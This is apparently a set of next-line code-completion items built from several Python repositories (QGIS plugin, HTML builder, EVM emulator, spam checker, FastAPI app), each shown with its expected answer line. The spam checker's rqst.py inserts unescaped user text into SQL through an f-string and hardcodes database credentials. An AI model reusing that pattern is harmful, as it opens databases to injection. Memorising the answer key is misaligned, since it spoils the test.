super(LayoutGeneratorDialog, self).__init__(parent)
# Set up the user interface from Designer through FORM_CLASS.
# After self.setupUi() you can access any designer object by doing
# self.<objectname>, and you can use autoconnect slots - see
# http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html
# #widgets-and-dialogs-with-auto-connect
self.setupUi(self)
# Path: 03_Exercise_2/exercise_2/layout_generator/core_functions.py
def import_vector_layer(layer_path, layer_name):
layer = QgsVectorLayer(layer_path, layer_name)
return layer if layer.isValid() else None
# Path: 03_Exercise_2/exercise_2/layout_generator/core_functions.py
def display_vector_layer(layer, name=None):
displayed_layer = QgsProject.instance().addMapLayer(layer)
if name:
displayed_layer.setName(name)
# Path: 03_Exercise_2/exercise_2/layout_generator/core_functions.py
def zoom_to_layer(layer):
canvas = iface.mapCanvas()
extent = layer.extent()
canvas.setExtent(extent)
canvas.refresh()
# Path: 03_Exercise_2/exercise_2/layout_generator/core_functions.py
def qml_loader(layer, layer_symbol_path):
layer.loadNamedStyle(layer_symbol_path)
layer.triggerRepaint()
iface.layerTreeView().refreshLayerSymbology(layer.id())
QgsProject.instance().addMapLayers([layer], False)
# Path: 03_Exercise_2/exercise_2/layout_generator/core_functions.py
def get_script_path_plugin():
return os.path.dirname(__file__)
# Path: 03_Exercise_2/exercise_2/layout_generator/layout.py
def layout_executor(
layers_name, layout_title, city_name, pdf_path
):
legend_layers = []
for layer_name in layers_name:
layer = QgsProject.instance().mapLayersByName(layer_name)[0]
legend_layers.append(layer)
layout = __layout_creator(layout_title)
__layout_map_window_creator(layer, layout, 20, 7, 294, 285)
__layout_label_creator(layout, 23, 266, 82, 24, background_color=QColor(255, 255, 255))
__layout_label_creator(
layout, 320, 5, 96, 6, layout_title, QColor(0, 182, 228),
14, 'bold', 'Arial'
)
__layout_legend_creator(layout, legend_layers, 319, 12, 98, 186)
__layout_label_creator(
layout, 320, 220, 96, 20, 'City Name', QColor(0, 182, 228), 20,
'bold', 'Arial'
)
__layout_label_creator(layout, 320, 230, 96, 20, city_name, QColor(), 16)
__layout_pdf_exporter(layout, pdf_path)
# Path: 03_Exercise_2/exercise_2/layout_generator/layout_generator.py
from qgis.PyQt.QtCore import QSettings, QTranslator, QCoreApplication
from qgis.PyQt.QtGui import QIcon
from qgis.PyQt.QtWidgets import QAction
from .resources import *
from .layout_generator_dialog import LayoutGeneratorDialog
from .core_functions import (
import_vector_layer, display_vector_layer, zoom_to_layer, qml_loader, get_script_path_plugin
)
from .layout import layout_executor
import os.path
# -*- coding: utf-8 -*-
"""
/***************************************************************************
LayoutGenerator
A QGIS plugin
auto layout generator
Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/
-------------------
begin : 2023-11-24
git sha : $Format:%H$
copyright : (C) 2023 by foss4g-asia
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
class LayoutGenerator:
"""QGIS Plugin Implementation."""
def __init__(self, iface):
"""Constructor.
:param iface: An interface instance that will be passed to this class
which provides the hook by which you can manipulate the QGIS
application at run time.
:type iface: QgsInterface
"""
# Save reference to the QGIS interface
self.iface = iface
# new variables
| self.layout_generator_dialog = LayoutGeneratorDialog() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: micheltlutz/Winged-Python
# Path: winged/HTML/string.py
class String(GenericElement):
text = ""
def __init__(self, str):
super().__init__()
self.text = str
def get_string(self):
return self.text
def generate(self):
print(self.get_string())
# Path: winged/core/generic_element.py
class GenericElement(ElementAbstract):
_elements: [ElementAbstract]
def __init__(self):
self._elements = []
# This method adds a new element
def add(self, element: ElementAbstract):
self._elements.append(element)
# This method returns the tag and all elements
def get_string(self):
string = ""
for element in self._elements:
string += element.get_string()
return string
# This method prints the tag and all elements
def generate(self):
print(self.get_string())
# Path: winged/core/tag.py
class Tag(ElementAbstract):
_tag: str = ""
_attributes: Attribute
_container: bool = False
_form_element: bool = False
_elements: [ElementAbstract]
def __init__(self, *attributes: AttributeType):
self._attributes = Attribute()
self._elements = []
for att in attributes:
self._attributes.add_attribute(att)
# This method adds n new attributes
def add_attributes(self, *attributes: AttributeType):
for att in attributes:
self._attributes.add_attribute(att)
# This method adds a new element
def add(self, element: ElementAbstract):
self._elements.append(element)
# This method returns the open tag and all attributes
def _get_open_tag(self):
attr = self._attributes.get_string()
if len(attr) > 0:
return f"<{self._tag} {attr}>"
else:
return f"<{self._tag}>"
# This method returns the close tag
def _get_close_tag(self):
return f"</{self._tag}>"
def get_tag(self):
return self._tag
def get_attributes(self):
return self._attributes
def is_container(self):
return self._container
def is_form_element(self):
return self._form_element
# This method returns the tag and all elements
def get_string(self):
string = self._get_open_tag()
if self._container:
for element in self._elements:
string += element.get_string()
string += self._get_close_tag()
return string
# This method prints the tag and all elements
def generate(self):
print(self.get_string())
# Path: winged/HTML/thead.py
class THead(Tag):
_tag = "thead" # Specifies the name of the tag
_container = True # Specifies that THead can contain other HTML elements
_form_element = False # Specifies that THead is not a form element
# Path: winged/HTML/tbody.py
class TBody(Tag):
_tag = "tbody" # Specifies the name of the tag
_container = True # Specifies that TBody can contain other HTML elements
_form_element = False # Specifies that TBody is not a form element
# Path: winged/HTML/tr.py
class Tr(Tag):
_tag = "tr" # Specifies the name of the tag
_container = True # Specifies that TR can contain other HTML elements
_form_element = False # Specifies that TR is not a form element
# Path: winged/HTML/th.py
class Th(Tag):
_tag = "th" # Specifies the name of the tag
_container = True # Specifies that TH can contain other HTML elements
_form_element = False # Specifies that TH is not a form element
# Path: winged/HTML/td.py
class Td(Tag):
_tag = "td" # Specifies the name of the tag
_container = True # Specifies that TD can encapsulate other HTML elements
_form_element = False # Specifies that TD is not a form element
# Path: winged/HTML/table.py
from winged.HTML.string import String
from winged.core.generic_element import GenericElement
from winged.core.tag import Tag
from winged.HTML.thead import THead
from winged.HTML.tbody import TBody
from winged.HTML.tr import Tr
from winged.HTML.th import Th
from winged.HTML.td import Td
"""
The Table class is a specific implementation of the HTML 'table' tag in the Winged-Python library.
It provides helper methods to generate table structures.
Table creation involves creating headers (th), rows (tr), and data cells (td).
# Example Usage:
```python
table = Table()
table.add_table_headers(["Name", "Age", "Height", "Location"]) # Define headers
table.add_row()
table.add_in_row(String("John"))
table.add_in_row(String("25"))
table.add_in_row(String("1.80"))
table.add_in_row(String("New York"))
```
This would generate a table with mentioned headers and one row of data.
"""
class Table(Tag):
_tag = "table"
_container = True
_form_element = False
def __init__(self):
super().__init__()
self.tbody = TBody()
self.thead = None
self.rows = []
def add_table_headers(self, titles, aligns=None, classes=None):
| self.thead = THead() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: davidhozic/TkClassWizard
# Path: tkclasswiz/extensions.py
@doc_category("Extensions")
def extendable(obj: Union[T, list]) -> T:
"""
Decorator that makes the obj extendable.
It wraps the ``obj``, which is a class or a function, into an extension object.
The extension object adds 3 methods to the original class or function:
- ``register_pre_extension``
- ``register_post_extension``
- ``get_extensions``
The ``get_extensions`` method just returns the list of registered
extensions (:class:`tkclasswiz.extensions.Extension`).
The ``register_pre_extension`` and ``register_post_extension`` methods allow users to extend
the functionality of original tkclass wiz classes or functions.
They accept the extension (:class:`tkclasswiz.extensions.Extension`) parameter.
Pre-extensions (``register_pre_extension``) get activated / called before the original ``__init__`` method /
before the original function; the ``loader`` of the extension must accept the same arguments
as the original ``__init__`` method / original function.
Post-extensions differ a bit if the thing being extended is a class or a function.
They both have in common that they get activated after the original ``__init__`` method call / original function
call, but they differ in the arguments they receive:
- In the case where the extended object is a class,
the extension ``loader`` accepts the same arguments as the ``__init__`` method receives.
- In the case where the extended object is a function,
the extension ``loader`` accepts the same arguments as the original function and an additional parameter,
which is the result of the original function call. The result parameter is passed to the ``loader`` as the
last positional argument.
Parameters
---------------
obj: T
Function or a class that can be extended.
"""
if DOCUMENTATION_MODE:
return obj
if isclass(obj):
@wraps(obj, updated=[])
class ExtendableClass(obj):
__reg_post_ext__ = []
__reg_pre_ext__ = []
def __init__(self, *args, **kwargs):
for extension in ExtendableClass.__reg_pre_ext__:
extension(self, *args, **kwargs)
super().__init__(*args, **kwargs)
extension: Extension
for extension in ExtendableClass.__reg_post_ext__:
extension(self, *args, **kwargs)
@classmethod
def register_pre_extension(cls, extension: Extension):
cls.__reg_pre_ext__.append(extension)
@classmethod
def register_post_extension(obj, extension: Extension):
obj.__reg_post_ext__.append(extension)
@classmethod
def get_extensions(obj):
return obj.__reg_pre_ext__, obj.__reg_post_ext__[:]
return ExtendableClass
else:
class ExtendableFunction:
__reg_post_ext__ = []
__reg_pre_ext__ = []
def __init__(self, bind: object = None) -> None:
self.bind = bind
def __call__(self, *args, **kwargs):
if self.bind is not None:
extra_args = (self.bind,) # self reference
else:
extra_args = ()
for ext in ExtendableFunction.__reg_pre_ext__:
ext(*extra_args, *args, **kwargs)
r = obj(*extra_args, *args, **kwargs)
for ext in ExtendableFunction.__reg_post_ext__:
r = ext(*extra_args, *args, r, **kwargs)
return r
def __get__(self, instance, cls):
# Bind the wrapper callable object into a callable object "instance"
return ExtendableFunction(instance)
@classmethod
def register_pre_extension(cls, extension: Extension):
cls.__reg_pre_ext__.append(extension)
@classmethod
def register_post_extension(cls, extension: Extension):
cls.__reg_post_ext__.append(extension)
@classmethod
def get_extensions(obj):
return obj.__reg_pre_ext__, obj.__reg_post_ext__[:]
return ExtendableFunction()
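To make the docstring above concrete, here is a minimal usage sketch of the class branch (hypothetical names; a bare function stands in for an Extension instance, which works because the dispatch code above simply calls each registered extension):

@extendable
class Greeter:
    def __init__(self, name):
        self.name = name

def announce(self, name):
    # post-extension: runs after Greeter.__init__ with the same arguments
    print(f"created Greeter for {name}")

Greeter.register_post_extension(announce)
g = Greeter("Ada")  # prints: created Greeter for Ada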
# Path: tkclasswiz/doc.py
def doc_category(
cat: str,
manual: Optional[bool] = False,
path: Optional[str] = None,
api_type: Literal["Program", "HTTP"] = "Program"
):
"""
Used to mark the object for documentation.
Objects marked with this decorator function will
have :mod:`sphinx.ext.autodoc` directives generated automatically.
Parameters
------------
cat: str
The name of the category to put this in.
manual: Optional[bool]
Generate ``function`` directives instead of ``autofunction``.
Should be used when dealing with overloads.
path: Optional[str]
Custom path to the object.
api_type: Literal["Program", "HTTP"]
The type of API, the documented item belongs to.
Defaults to 'Program'
"""
def _category(item): # item == class or function
if DOCUMENTATION_MODE:
cat_map[api_type][cat].append((item, manual, path))
return item
if DOCUMENTATION_MODE:
if cat not in cat_map[api_type]:
cat_map[api_type][cat] = []
return _category
# Path: tkclasswiz/object_frame/frame_string.py
from typing import Any
from ..storage import *
from .frame_base import *
from ..extensions import extendable
from ..doc import doc_category
import tkinter as tk
TEXT_MAX_UNDO = 20
__all__ = (
"NewObjectFrameString",
)
| @extendable
|
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: har777/snek-evm
# Path: vm.py
class EVM:
def __init__(self):
self.address_to_contract = {}
def create_contract(self, bytecode, address):
contract = Contract(bytecode=bytecode, address=address)
self.address_to_contract[address] = contract
return contract
def execute_transaction(self, address, transaction_metadata, operation_metadata=None, debug=False):
if not operation_metadata:
operation_metadata = OperationMetadata()
operation = Operation(
evm=self,
address=address,
transaction_metadata=transaction_metadata,
operation_metadata=operation_metadata,
)
operation.execute(debug=debug)
return operation
def __str__(self):
return f"EVM(address_to_contract={self.address_to_contract})"
# Path: vm.py
class TransactionMetadata:
def __init__(self, from_address, value="0", data="0x"):
# calldata has to be even length if present
if len(data) % 2 != 0:
raise Exception("Invalid calldata length")
self.from_address = from_address.lower()
self.value = value
self.data = data.lower()
def __str__(self):
return f"TransactionMetadata(from={self.from_address} value={self.value}, data={self.data})"
# Path: vm.py
def get_create_contract_address(sender_address: str, sender_nonce: int):
sender = bytes.fromhex(sender_address[2:])
contract_address = "0x" + keccak.new(digest_bits=256, data=rlp.encode([sender, sender_nonce])).hexdigest()[-40:]
return contract_address
# Path: vm.py
def get_create2_contract_address(origin_address: str, salt: int, initialisation_code: str):
contract_address = "0x" + keccak.new(digest_bits=256, data=(
bytes.fromhex("ff") +
bytes.fromhex(origin_address[2:]) +
bytes.fromhex(hex(salt)[2:].rjust(64, "0")) +
bytes.fromhex(keccak.new(digest_bits=256, data=bytes.fromhex(initialisation_code)).hexdigest())
)).hexdigest()[-40:]
return contract_address
# Path: test.py
import unittest
from vm import EVM, TransactionMetadata, get_create_contract_address, get_create2_contract_address
class UtilTestCase(unittest.TestCase):
def test_get_create_contract_address(self):
sender_address = "0x6ac7ea33f8831ea9dcc53393aaa88b25a785dbf0"
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=0),
"0xcd234a471b72ba2f1ccf0a70fcaba648a5eecd8d")
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=1),
"0x343c43a37d37dff08ae8c4a11544c718abb4fcf8")
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=2),
"0xf778b86fa74e846c4f0a1fbd1335fe81c00a0c91")
self.assertEqual(get_create_contract_address(sender_address=sender_address, sender_nonce=3),
"0xfffd933a0bc612844eaf0c6fe3e5b8e9b6c1d19c")
def test_get_create2_contract_address(self):
# https://eips.ethereum.org/EIPS/eip-1014
self.assertEqual(
get_create2_contract_address(
origin_address="0x0000000000000000000000000000000000000000",
salt=0,
initialisation_code="00"
),
"0x4d1a2e2bb4f88f0250f26ffff098b0b30b26bf38"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0xdeadbeef00000000000000000000000000000000",
salt=0,
initialisation_code="00"
),
"0xb928f69bb1d91cd65274e3c79d8986362984fda3"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0xdeadbeef00000000000000000000000000000000",
salt=1455368932401306996839762510191304720241787928576,
initialisation_code="00"
),
"0xd04116cdd17bebe565eb2422f2497e06cc1c9833"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x0000000000000000000000000000000000000000",
salt=0,
initialisation_code="deadbeef"
),
"0x70f2b2914a2a4b783faefb75f459a580616fcb5e"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x00000000000000000000000000000000deadbeef",
salt=3405691582,
initialisation_code="deadbeef"
),
"0x60f3f640a8508fc6a86d45df051962668e1e8ac7"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x00000000000000000000000000000000deadbeef",
salt=3405691582,
initialisation_code="deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef"
),
"0x1d8bfdc5d46dc4f61d6b6115972536ebe6a8854c"
)
self.assertEqual(
get_create2_contract_address(
origin_address="0x0000000000000000000000000000000000000000",
salt=0,
initialisation_code=""
),
"0xe33c0c7f7df4809055c3eba6c09cfe4baf1bd9e0"
)
class OpcodeTestCase(unittest.TestCase):
def setUp(self):
| self.evm = EVM() |
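As an aside, deriving a plain CREATE address needs only the sender and nonce; the expected value below is taken directly from the test vectors above:

addr = get_create_contract_address(
    sender_address="0x6ac7ea33f8831ea9dcc53393aaa88b25a785dbf0",
    sender_nonce=0,
)
assert addr == "0xcd234a471b72ba2f1ccf0a70fcaba648a5eecd8d"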
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: AvaterClasher/eli
# Path: eli/exceptions/auth.py
class CredentialsError(Exception): ...
# Path: eli/exceptions/connection.py
class NetworkError(Exception): ...
# Path: eli/constants/service.py
MINDSDB_HOST = 'https://cloud.mindsdb.com'
# Path: eli/middlewares/mindsdb.py
class MindsDB:
"""
MindsDB manager class
"""
def __init__(self, email: str, password: str) -> None:
"""
initializer class.
Args:
email: MindsDB account email address (that is stored as an env var)
password: MindsDB account password
"""
self.email = email
self.password = password
self.is_authenticated: bool = False
self.database: Database
def authenticate(self) -> None:
"""
authorizes the email and password with MindsDB's host
"""
try:
server = mindsdb_sdk.connect(
MINDSDB_HOST,
login=self.email,
password=self.password,
)
except HTTPError:
raise CredentialsError('Email or password is incorrect. Make sure to enter the right credentials.')
except ConnectionError:
raise NetworkError('Make sure you have access to the internet and try again.')
self.is_authenticated = True
self.database = self.collect_database(server)
@staticmethod
def collect_database(server: Server) -> Database:
return server.list_databases()[0]
def answer(self, question: str) -> Markdown:
"""
takes the question, queries the database, then converts the response into `rich.Markdown`
Args:
question: the value from `ask` positional argument
Returns:
response from MindsDB in Markdown format
"""
return Markdown(to_data(
self.database.query(
SQL_ASK_QUERY.substitute(
ask=question,
user=getuser(),
)
).fetch()
))
# Path: tests/middlewares/test_mindsdb.py
import pytest
from pandas import DataFrame
from unittest.mock import patch, MagicMock
from eli.exceptions.auth import CredentialsError
from eli.exceptions.connection import NetworkError
from requests.exceptions import HTTPError, ConnectionError
from eli.constants.service import MINDSDB_HOST
from eli.middlewares.mindsdb import MindsDB
@patch('mindsdb_sdk.connect')
def test_authenticate(mock_connect):
email = '[email protected]'
password = 'testpassword'
mock_server = MagicMock()
mock_connect.return_value = mock_server
mindsdb = MindsDB(email, password)
mindsdb.authenticate()
mock_connect.assert_called_once_with(MINDSDB_HOST, login=email, password=password)
mock_server.list_databases.assert_called_once()
assert mindsdb.is_authenticated is True
def test_authenticate_incorrect_password():
mindsdb = MindsDB('[email protected]', 'testpassword')
with pytest.raises(CredentialsError):
with patch('mindsdb_sdk.connect', side_effect=HTTPError):
mindsdb.authenticate()
def test_authenticate_network_error():
mindsdb = MindsDB('[email protected]', 'testpassword')
| with pytest.raises(NetworkError): |
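The network-error test presumably continues by patching the connector to raise ConnectionError, mirroring the HTTPError case above; a sketch of the complete test under that assumption:

def test_authenticate_network_error():
    mindsdb = MindsDB('[email protected]', 'testpassword')
    with pytest.raises(NetworkError):
        with patch('mindsdb_sdk.connect', side_effect=ConnectionError):
            mindsdb.authenticate()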
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: xduck7/AI_Spam_checker
# Path: predict.py
def do_prediction(message):
# load the model
loaded_model = load_model('./Model/your_model.h5')
loaded_label_encoder = joblib.load('./Model/label_encoder.pkl')
loaded_vectorizer = joblib.load('./Model/vectorizer.pkl')
# get the message
input_text = [message]
X_input = loaded_vectorizer.transform(input_text).toarray()
y_pred_prob = loaded_model.predict(X_input)
#print(y_pred_prob)  # print the probability / debugging
# convert the probability to 1 if it is > 0.515
threshold = 0.515
y_pred = (y_pred_prob > threshold).astype(int)
predicted_class = loaded_label_encoder.inverse_transform(y_pred)
# output the result
print(f'Predicted class: {predicted_class[0]}')  # debugging
return y_pred
# Path: rqst.py
def add_report(msg, pred):
id = gen_id()
author = names.get_first_name()
date_time = datetime.datetime.now()
conn = psycopg2.connect(dbname='postgres',
user='postgres',
password='postgres',
host='localhost',
port='5432')
cursor = conn.cursor()
cursor.execute("INSERT INTO forspam (id, date_time, author, content, class) values "+
f"('{id}','{date_time}','{author}','{msg}','{pred}')")
conn.commit()
cursor.close()
conn.close()
# Path: rqst.py
def first_start():
conn = psycopg2.connect(dbname='postgres',
user='postgres',
password='postgres',
host='localhost',
port='5432')
cursor = conn.cursor()
cursor.execute("CREATE TABLE IF NOT EXISTS forspam ("+
"ID VARCHAR, " +
"DATE_TIME VARCHAR, " +
"AUTHOR VARCHAR, " +
"CONTENT VARCHAR, " +
"CLASS VARCHAR )")
conn.commit()
cursor.close()
conn.close()
# Path: start.py
import tkinter as tk
from predict import do_prediction
from rqst import add_report
from rqst import first_start
root= tk.Tk()
root.title("SPAM CHECKER")
root.geometry("500x600")
root.resizable(width=True, height=True)
def get_input():
inputValue=textBox.get("1.0","end-1c")
print(inputValue)
textBox.delete('1.0', 'end')
return inputValue
def union():
msg = get_input()
result = do_prediction(msg)
if (result == 1):
final_opinion = "✅"
else:
final_opinion = "❌"
#final_opinion = ("Spam result is " + str(result))
label_result.configure(text=final_opinion)
label_result.pack()
add_report(str(msg), str(result[0][0]))
image = tk.PhotoImage(file='./Image/logo.png')
smaller_image = image.subsample(5, 5)
panel = tk.Label(root, image = smaller_image)
textBox= tk.Text(root,
height=3, width=80,
borderwidth=5,
font="Arial 18")
panel_text = tk.Label(text="Spam checker",
font="Arial 16")
panel_values = tk.Label(text="✅ = spam \n ❌ = NOT spam",
font="Arial 16")
buttonCommit= tk.Button(root,
height=1, width=10,
text="Check spam",font='Arial 20',
command=lambda: union(),
borderwidth=5)
label_result = tk.Label(text="Loading...", font="Arial 20")
filler = tk.Label(text=' ')
| first_start() |
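For reference, the thresholding step inside do_prediction() reduces to a single comparison; with a made-up model output:

import numpy as np

y_pred_prob = np.array([[0.62]])            # hypothetical probability from the model
y_pred = (y_pred_prob > 0.515).astype(int)  # [[1]] -> classified as spam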
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: TheJacksonLaboratory/geneweaver-boolean-algebra
# Path: tests/unit/const.py
BOOLEAN_GENESET_GENES_0 = {
GeneValue(symbol="A", value=1),
GeneValue(symbol="B", value=1),
GeneValue(symbol="C", value=1),
GeneValue(symbol="D", value=1),
}
# Path: tests/unit/const.py
BOOLEAN_GENESET_GENES_1 = {
GeneValue(symbol="A", value=1),
GeneValue(symbol="E", value=1),
GeneValue(symbol="F", value=1),
GeneValue(symbol="G", value=1),
GeneValue(symbol="H", value=1),
}
# Path: tests/unit/const.py
BOOLEAN_GENESET_GENES_2 = {
GeneValue(symbol="A", value=1),
GeneValue(symbol="E", value=1),
GeneValue(symbol="F", value=1),
GeneValue(symbol="G", value=1),
GeneValue(symbol="H", value=1),
GeneValue(symbol="I", value=1),
}
# Path: tests/unit/const.py
DIFF_BOOLEAN_GENESET_GENES_0_1_2 = {
GeneValue(symbol="B", value=1),
GeneValue(symbol="C", value=1),
GeneValue(symbol="D", value=1),
GeneValue(symbol="I", value=1),
}
# Path: tests/unit/const.py
INT_BOOLEAN_GENESET_GENES_0_1 = {GeneValue(symbol="A", value=1)}
# Path: tests/unit/const.py
INT_BOOLEAN_GENESET_GENES_0_1_2 = {GeneValue(symbol="A", value=1)}
# Path: tests/unit/const.py
INT_BOOLEAN_GENESET_GENES_0_2 = {GeneValue(symbol="A", value=1)}
# Path: tests/unit/const.py
INT_BOOLEAN_GENESET_GENES_1_2 = {
GeneValue(symbol="A", value=1),
GeneValue(symbol="E", value=1),
GeneValue(symbol="F", value=1),
GeneValue(symbol="G", value=1),
GeneValue(symbol="H", value=1),
}
# Path: tests/unit/const.py
UNION_BOOLEAN_GENESET_GENES_0_1 = {
GeneValue(symbol="A", value=1),
GeneValue(symbol="B", value=1),
GeneValue(symbol="C", value=1),
GeneValue(symbol="D", value=1),
GeneValue(symbol="E", value=1),
GeneValue(symbol="F", value=1),
GeneValue(symbol="G", value=1),
GeneValue(symbol="H", value=1),
}
# Path: tests/unit/test_boolean_algebra_tool.py
from pathlib import Path
from geneweaver.tools.boolean_algebra.tool import (
BooleanAlgebra,
BooleanAlgebraInput,
BooleanAlgebraOutput,
BooleanAlgebraType,
WorkflowType,
)
from tests.unit.const import (
BOOLEAN_GENESET_GENES_0,
BOOLEAN_GENESET_GENES_1,
BOOLEAN_GENESET_GENES_2,
DIFF_BOOLEAN_GENESET_GENES_0_1_2,
INT_BOOLEAN_GENESET_GENES_0_1,
INT_BOOLEAN_GENESET_GENES_0_1_2,
INT_BOOLEAN_GENESET_GENES_0_2,
INT_BOOLEAN_GENESET_GENES_1_2,
UNION_BOOLEAN_GENESET_GENES_0_1,
)
import pytest
"""Test the boolean algebra tool class."""
@pytest.mark.parametrize(
("input_value", "expected"),
[
# Union
(
BooleanAlgebraInput(
type=BooleanAlgebraType.UNION,
| input_genesets=[BOOLEAN_GENESET_GENES_0, BOOLEAN_GENESET_GENES_1], |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: jpcadena/fastapi-boilerplate
# Path: app/api/deps.py
class RedisConnectionManager:
"""
Redis connection manager class
"""
def __init__(self, auth_settings: AuthSettings):
self.url: str = f"{auth_settings.REDIS_DATABASE_URI}"
self.pool: Optional[Redis] = None # type: ignore
async def start(self) -> None:
"""
Start the redis pool connection
:return: None
:rtype: NoneType
"""
self.pool = Redis.from_url(self.url, decode_responses=True)
await self.pool.ping()
logger.info("Redis Database initialized")
async def stop(self) -> None:
"""
Stops the redis connection
:return: None
:rtype: NoneType
"""
await self.pool.close() # type: ignore
async def get_connection(self) -> Optional[Redis]: # type: ignore
"""
Get the connection
:return: The redis connection
:rtype: Optional[Redis]
"""
return self.pool
@asynccontextmanager
async def connection(self) -> AsyncGenerator[Redis, Any]: # type: ignore
"""
Asynchronously get the connection from the pool context manager
:return: Yields the generator object
:rtype: AsyncGenerator[Redis, Any]
"""
await self.start()
yield self.pool # type: ignore
await self.stop()
# Path: app/config/config.py
@lru_cache()
def get_auth_settings() -> AuthSettings:
"""
Get auth settings cached
:return: Auth settings instance
:rtype: AuthSettings
"""
return AuthSettings()
# Path: app/config/config.py
@lru_cache()
def get_init_settings() -> InitSettings:
"""
Get init settings cached
:return: The init settings instance
:rtype: InitSettings
"""
return init_setting
# Path: app/config/config.py
@lru_cache()
def get_settings() -> Settings:
"""
Get settings cached
:return: The settings instance
:rtype: Settings
"""
return Settings()
# Path: app/crud/user.py
async def get_user_repository() -> UserRepository:
"""
Create a UserRepository with an async database session, an index
filter, and a unique filter.
:return: A UserRepository instance
:rtype: UserRepository
"""
return UserRepository(
await get_session(),
await get_index_filter(),
await get_unique_filter(),
)
# Path: app/db/init_db.py
async def init_db(
user_repo: UserRepository,
settings: Settings,
init_settings: InitSettings,
auth_settings: AuthSettings,
) -> None:
"""
Initialize the database connection and create the necessary tables.
:param user_repo: The user repository dependency.
:type user_repo: UserRepository
:param settings: Dependency method for cached setting object
:type settings: Settings
:param init_settings: Dependency method for cached init setting object
:type init_settings: InitSettings
:param auth_settings: Dependency method for cached setting object
:type auth_settings: AuthSettings
:return: None
:rtype: NoneType
"""
await create_db_and_tables()
await create_superuser(user_repo, settings, init_settings, auth_settings)
# Path: app/services/infrastructure/ip_blacklist.py
def get_ip_blacklist_service(
redis: Annotated[Redis, Depends(get_redis_dep)], # type: ignore
auth_settings: Annotated[AuthSettings, Depends(get_auth_settings)],
) -> IPBlacklistService:
"""
Get an instance of the IP Blacklist service
:param redis: Dependency method for async Redis connection
:type redis: Redis
:param auth_settings: Dependency method for cached setting object
:type auth_settings: AuthSettings
:return: IPBlacklistService instance
:rtype: IPBlacklistService
"""
return IPBlacklistService(redis, auth_settings.BLACKLIST_EXPIRATION_SECONDS)
# Path: app/core/lifecycle.py
import logging
from contextlib import asynccontextmanager
from typing import Any, AsyncGenerator
from fastapi import FastAPI
from app.api.deps import RedisConnectionManager
from app.config.config import get_auth_settings, get_init_settings, get_settings
from app.crud.user import get_user_repository
from app.db.init_db import init_db
from app.services.infrastructure.ip_blacklist import get_ip_blacklist_service
"""
A module for lifecycle in the app-core package.
"""
logger: logging.Logger = logging.getLogger(__name__)
@asynccontextmanager
async def lifespan(application: FastAPI) -> AsyncGenerator[Any, None]:
"""
The lifespan of the application
:param application: The FastAPI application
:type application: FastAPI
:return: An asynchronous generator for the application
:rtype: AsyncGenerator[Any, None]
"""
logger.info("Starting API...")
try:
| application.state.settings = get_settings() |
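The body of the try block is cut off here; a minimal sketch of how such a lifespan function typically wires up the pieces imported above (assumed shape, not the repository's actual code):

@asynccontextmanager
async def lifespan_sketch(application: FastAPI) -> AsyncGenerator[Any, None]:
    redis_manager = RedisConnectionManager(get_auth_settings())
    await redis_manager.start()  # open the Redis pool
    user_repo = await get_user_repository()
    await init_db(user_repo, get_settings(), get_init_settings(), get_auth_settings())
    yield  # the application serves requests here
    await redis_manager.stop()  # release the pool on shutdown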
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: juliusmarkwei/auth-system
# Path: backend/accounts/serializers.py
class UserSerializer(serializers.ModelSerializer):
date_joined = serializers.ReadOnlyField()
password = serializers.CharField(write_only=True)
class Meta(object):
model = User
fields = (
"id",
"username",
"is_verified",
"email",
"first_name",
"last_name",
"address",
"phone",
"date_joined",
"updated_at",
"password"
)
extra_kwargs = {"password": {"write_only": True}}
def create(self, validated_data):
password = validated_data.pop('password', None)
instance = self.Meta.model(**validated_data)
# Adding the below line made it work for me.
instance.is_active = True
if password is not None:
# Set password does the hash, so you don't need to call make_password
instance.set_password(password)
instance.save()
return instance
# Path: backend/accounts/models.py
class User(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(max_length=40, unique=True)
is_verified = models.BooleanField(default=False)
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
username = models.CharField(max_length=100, unique=True)
is_staff = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
address = models.CharField(max_length=100, blank=True, null=True)
phone = models.CharField(max_length=20, blank=True, null=True)
